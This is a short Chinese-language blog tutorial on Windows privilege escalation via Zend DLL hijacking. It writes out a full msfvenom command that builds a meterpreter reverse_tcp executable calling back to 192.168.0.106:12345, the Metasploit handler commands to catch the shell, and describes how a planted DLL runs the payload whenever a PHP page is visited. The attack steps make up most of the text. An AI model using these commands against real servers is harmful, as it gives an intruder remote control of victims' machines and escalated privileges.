提权教程之zend反弹shell提权

Admin 2020-07-06 95人围观 ,发现0个评论 Web安全提权教程shell提权zend反弹

这篇是接着上篇内容所说。

Zend_DLL_Hijacking.exe执行远控
msfconsole 生成反弹shell

生成攻击载荷

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe

本地监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106 

set lport 12345

exploit


监听端口

提权教程之zend反弹shell提权 Web安全 第1张

提权工具生成dll

提权教程之zend反弹shell提权 Web安全 第2张

 

当有人访问php网页的时候 就会加载dl

执行我们s.exe 那么 msf 就会监听到一个反弹shell

 

提权教程之zend反弹shell提权 Web安全 第3张


    请发表您的评论
    请关注微信公众号
    微信二维码
    不容错过
    Powered By 蚁人博客